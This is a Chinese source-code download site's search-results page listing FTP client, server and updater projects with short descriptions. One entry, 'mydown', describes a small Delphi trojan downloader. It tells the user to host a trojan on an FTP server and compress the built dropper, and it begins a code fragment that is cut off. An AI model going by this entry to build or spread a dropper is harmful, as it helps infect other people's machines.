CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 搜索资源 - FTP implementation

搜索资源列表

  1. 东南大学虚拟社区系统1.0版本面板

    0下载:
  2. 花了一个月时间搞成的 很不错的一个面板 可作FTp的参考 实现文件上传下载及类似BBS的用户管理 查询-spent a month turned into a very good one FTp panel for the reference implementation of the file upload and download category it BBS users manage inquiries
  3. 所属分类:其他行业

    • 发布日期:2008-10-13
    • 文件大小:5813311
    • 提供者:宋雷
  1. c++builder6编程实例精讲

    0下载:
  2. C++Builder 6 是一款快速开发Win32 应用程序的可视化开发工具,利用它可以实现高性 能的执行效率和出色的底层控制。C++Builder 6 相比于5 以前的版本,提供了更多的网络开 发组件,更快速方便的可视化环境。 本书共有14 章,前三章分别介绍C++Builder 的开发环境、比较特殊的语法,并在第三 章用实例讲述使用C++Builder 开发应用程序的过程,以后的章节均通过实例讲述C++Builder 某个方面的编程技术与技巧。这些实例包括文本、绘图与图象
  3. 所属分类:开发工具

    • 发布日期:2008-10-13
    • 文件大小:5226630
    • 提供者:夺夺
  1. FtpSearch

    0下载:
  2. Ftp搜索工具,主要介绍了属性页控件,对指定IP执行Ping命令查看主机存活状态,扫描主机端口,打开、添加、查询和关闭数据库,IP地址控件的使用等-Ftp search tools, the main attribute of pages controls, the implementation of a designated IP Ping order to survive View host state, scanning host ports, open, add, query and c
  3. 所属分类:Ftp客户端

    • 发布日期:2008-10-13
    • 文件大小:94682
    • 提供者:李悝
  1. UpDemo

    0下载:
  2. UPDDEMO,展示了用WinInet FTP函数在第二个线程执行期间从匿名FTP服务器上下载文件的方法。-UPDDEMO. using WinInet display FTP function in the second threads implementation period from anonymous FTP server download methods.
  3. 所属分类:Windows编程

    • 发布日期:2008-10-13
    • 文件大小:8340
    • 提供者:郑森
  1. linuxdown-1.0.0

    0下载:
  2. linux下的ftp客户端,支持多线程下载, c代码实现,功能强大-the ftp client, support for multi-threaded download, c implementation of the code, powerful
  3. 所属分类:Linux/Unix编程

    • 发布日期:2008-10-13
    • 文件大小:7185
    • 提供者:魏湖
  1. mydown

    0下载:
  2. 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadF
  3. 所属分类:网络编程

    • 发布日期:2008-10-13
    • 文件大小:1436
    • 提供者:韩冰
  1. ftptest

    0下载:
  2. 入门程序,用于测试ftp的基本编程, 可以学习ftp的代码实现-entry procedures for testing the basic ftp program, we can learn from the source implementation ftp
  3. 所属分类:Linux/Unix编程

    • 发布日期:2008-10-13
    • 文件大小:1512
    • 提供者:孙憬超
  1. Server_Ftp

    0下载:
  2. 利用进程通信套接字socket 的编程接口功能,设计和实现了一个简单的文件传输协议。此为FTP服务器端。-communications process using socket programming interface functions, Design and Implementation of a simple file transfer protocol. To this FTP server.
  3. 所属分类:网络编程

    • 发布日期:2008-10-13
    • 文件大小:19391
    • 提供者:wu
  1. ftpcl

    0下载:
  2. 底层实现ftp客户端-underlying implementation ftp client
  3. 所属分类:Ftp客户端

    • 发布日期:2008-10-13
    • 文件大小:37307
    • 提供者:辛痕
  1. 软件在线升级系统

    0下载:
  2. “软件在线升级系统”执行说明: 1、 光盘目录vc6.0\\chapter6\\bin\\UpgradeAtv.dll为本系统的可执行文件。在测试之前要先使用regsvr32.exe注册这个DLL。 2、 光盘目录vc6.0\\chapter6\\Pages是本系统的测试页面。 3、 光盘目录vc6.0\\chapter6\\setup是系统安装指导。 4、 光盘目录vc6.0\\chapter6\\src\\UpgradeAtv\\*.*为本系统的VC源程序。 5、 光盘目录vc6.0\\ch
  3. 所属分类:Windows编程

    • 发布日期:2008-10-13
    • 文件大小:3610775
    • 提供者:徐夕
  1. c语言实现软件自动升级

    0下载:
  2. 用C及ftp实现软件自动升级。通过在服务器端建立FTP服务,实现远程主机的文件更新. 软件启动过程连接服务器,获得软件文件更新列表(此步省略),进行本地文件更新 启动过程进行系统调用执行批处理文件ftpget.bat,调用方式system( \"e:\\\\ftpget.bat\" ) 文件ftpget.bat负责连接服务器下载所需文件,并完成文件的更新-C ftp software and automatic upgrades. Through the establis
  3. 所属分类:通讯编程

    • 发布日期:2008-10-13
    • 文件大小:1185
    • 提供者:lll
  1. Miniftp

    0下载:
  2. miniFTP实现源代码,类似于DOS窗口方式执行FTP命令-miniFTP implementation source code, similar to the DOS window to execute FTP command way
  3. 所属分类:WinSock-NDIS

    • 发布日期:2017-03-23
    • 文件大小:491881
    • 提供者:王先锋
  1. qk_vcftp

    0下载:
  2. VC++简单FTP客户端带毕业设计 主要是练习Winlnet类的简单使用,使用C++实现,有设计文档和使用手册。这只是实现一个简单的基本的FTP上传功能,你不能拿它和现在流行的FTP软件来比。可以帮你开拓编程思路及研究一些类的使用方法。 -VC++ simple FTP client with a graduation class is mainly practiced Winlnet simple to use, using C++ implementation, a design doc
  3. 所属分类:Ftp Client

    • 发布日期:2017-05-10
    • 文件大小:2503684
    • 提供者:秦坤
  1. FTP_Client_library_in_CSharp

    0下载:
  2. 这是一个C#实现的FTP客户端的类库文件的实现方法,内附测试程序。-This is a C# implementation of the FTP client library file implementations, enclosing the test program.
  3. 所属分类:Ftp Client

    • 发布日期:2017-03-22
    • 文件大小:3546
    • 提供者:ZAOJIA
  1. Linux_MyFTP

    0下载:
  2. Linux下的ftp服务器,实现了32个常用命令。同时实现了限速功能。-Ftp server under Linux, implementation of the 32 commonly used commands. At the same time, achieve the rate-limiting function.
  3. 所属分类:Linux-Unix program

    • 发布日期:2017-03-30
    • 文件大小:30441
    • 提供者:祝久文
  1. ftpclient

    0下载:
  2. FTP 客户端实现。包括get,put,pwd,dir,cd等命令。-FTP Client implementation.Including commands such as get,put,pwd,dir and cd.
  3. 所属分类:Ftp Client

    • 发布日期:2017-04-02
    • 文件大小:1765
    • 提供者:潘春雨
  1. FTP_Client

    1下载:
  2. 遵循FTP协议,实现远程文件的上传、下载、查看以及远程目录的创建和删除。-Follow the FTP protocol, implementation of remote file upload, download, view and remote directory to create and delete.
  3. 所属分类:WinSock-NDIS

    • 发布日期:2015-03-05
    • 文件大小:164590
    • 提供者:bfbd
  1. RemoteControl_2008-11-20_13-06

    1下载:
  2. 简易的FTP服务器端和客户端实现,用java编写-Simple FTP server and client implementation, using java prepared
  3. 所属分类:Ftp Server

    • 发布日期:2016-03-12
    • 文件大小:79214
    • 提供者:wenhelin
  1. sftp

    0下载:
  2. JAVA实现的TFTP,类似与FTP的功能,有服务器、客户端,可以实现文件上传到服务器。-JAVA implementation of TFTP, and FTP similar functions, have the server, the client, you can achieve a file upload to the server.
  3. 所属分类:Java Develop

    • 发布日期:2017-04-07
    • 文件大小:41963
    • 提供者:李玲
  1. Dtop

    0下载:
  2. 预测神经网络,vc的程序,实现基本遗传算法的实现(Prediction of neural network, VC program and implementation of basic genetic algorithm)
  3. 所属分类:Delphi控件源码

    • 发布日期:2018-04-29
    • 文件大小:5625856
    • 提供者:熬不过
« 1 2 3 4 56 7 8 9 10 »
搜珍网 www.dssz.com